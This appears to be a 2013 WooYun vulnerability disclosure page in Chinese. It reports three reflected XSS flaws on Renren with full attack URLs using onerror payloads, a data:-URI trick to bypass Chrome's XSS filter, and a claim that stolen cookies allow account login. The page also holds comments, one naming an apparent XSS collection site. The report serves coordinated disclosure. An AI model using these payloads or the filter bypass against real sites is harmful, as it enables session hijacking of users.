当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035877

漏洞标题:人人网三个XSS可以盗取cookie并成功登录

相关厂商:人人网

漏洞作者: px1624

提交时间:2013-09-02 14:52

修复时间:2013-10-17 14:52

公开时间:2013-10-17 14:52

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-02: 细节已通知厂商并且等待厂商处理中
2013-09-02: 厂商已经确认,细节仅向厂商公开
2013-09-12: 细节向核心白帽子及相关领域专家公开
2013-09-22: 细节向普通白帽子公开
2013-10-02: 细节向实习白帽子公开
2013-10-17: 细节向公众公开

简要描述:

人人网的xss危害还是蛮大的,按照一个5rank算的话,3个也有15rank了吧。话说,顺便把我的人人vip给续成年费吧!

详细说明:

一、 直入主题,三个xss:
1 参数ss没过滤:

http://page.renren.com/601740863/index?ss=17017aaaaaaaaaa"><img src=1 onerror=alert(1)>&tr=1

2 参数srcUrl没过滤:

http://3g.renren.com/login.do?srcUrl="><img src=1 onerror=alert(1)>

3 参数pid没过滤:

http://reg.renren.com/xn6227.do?ss=10129&rt=1&surl=http://app.renren.com/reg/reg/profile?pid=699070439llllll"><img src=1 onerror=alert(1)>

二、 说说xss的利用:
由于人人网没有http-only,cookie一站式,所以可以盗取 用户cookie并成功登录,或者骗取管理员cookie登入后台。
下面是用小号,和两个浏览器测试的结果。(成功盗取cookie并登录)

1.png


2.png


三、 细心的人可能发现了,这三个xss只能在IE下执行,谷歌(谷歌内核比如猎豹、360)下会被浏览器干掉onerror后面的东西,导致漏洞威力大打折扣。
不过,我们可以通过瘦子教程中的方法绕过(利用谷歌浏览器的date协议)。
比如:
IE浏览器下:

http://page.renren.com/601740863/index?ss=17017aaaaaaaaaa"><img src=1 onerror=alert(1)>&tr=1

3.png

谷歌浏览器下:

http://page.renren.com/601740863/index?ss=17017aaaaaaaaaa"><script src=data:,alert(1)<!--&tr=1

4.png


哈哈,这样就可以通杀所有浏览器了。

漏洞证明:

详细见上面。

修复方案:

修补:1 过滤存在缺陷的相关参数。
2 年费VIP啊!!!

版权声明:转载请注明来源 px1624@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-09-02 14:54

厂商回复:

感谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-09-02 14:53 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @px1624 那货绝对是狗哥

  2. 2013-09-02 15:08 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @Finger 还没看到通过,就被确认了,我去。我问了狗哥,他说不是诶,狗哥应该没有这么斯文吧,应该是你吧~o(∩_∩)o

  3. 2013-09-02 15:09 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @px1624 狗哥不好意思承认 我压根就没人人账号

  4. 2013-09-02 15:12 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @Finger 哈哈~理论上来说 应该就是审核的人 那个不是我的好友 没道理会中招诶

  5. 2013-09-02 15:21 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @px1624 理论要联系实际的 事实上我们也不知道这是哪位大侠

  6. 2013-09-02 15:29 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @Finger 。。。好奇怪,也不是我的人人好友,那应该就是人人网的奇葩了吧。。

  7. 2013-09-02 15:40 | xnxss ( 路人 | Rank:26 漏洞数:5 | 只有你想不到的。。。。)

    等待公开

  8. 2013-10-17 15:40 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    pxss.sinaapp.com 哈哈哈,要是CC半天,看看云豆够不够啊~

  9. 2013-10-17 15:55 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @小胖子 有防火墙啊,少年。。

  10. 2014-02-11 22:05 | wusuopubupt ( 路人 | Rank:3 漏洞数:2 | BUPTer, linux lover.)

    date协议!